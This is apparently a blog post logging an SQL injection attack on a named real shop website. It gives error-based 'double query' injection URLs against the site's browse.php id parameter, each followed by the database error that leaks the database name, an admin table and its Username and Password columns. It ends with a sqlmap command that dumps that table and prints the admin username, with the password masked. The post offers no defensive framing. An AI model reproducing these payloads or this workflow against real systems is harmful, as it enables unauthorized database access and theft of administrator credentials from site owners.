SQL injection double query + SQL Map
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(database()%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'bigshops~1' for key
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'admin~1' for key
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'Username~1' for key 1
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'Password~1' for key 1
then i am dump with SQL Map
jincorn@jincorn-R00t/pentest/database/sqlmap$ ./sqlmap.py -o --url="http://www.bigshops.co.il/links/browse.php?id=1 " -D bigshops -T admin --dump
Database: bigshops
Table: admin
[1 entry]
+----+----------------------------------+----------+
| ID | Password | Username |
+----+----------------------------------+----------+
| 1 | *********************** | alondb |
+----+----------------------------------+----------+
>>user : alondb
>>pass : **************************
Thankz : cep khan , ksatria tanpa nama
0 komentar:
Posting Komentar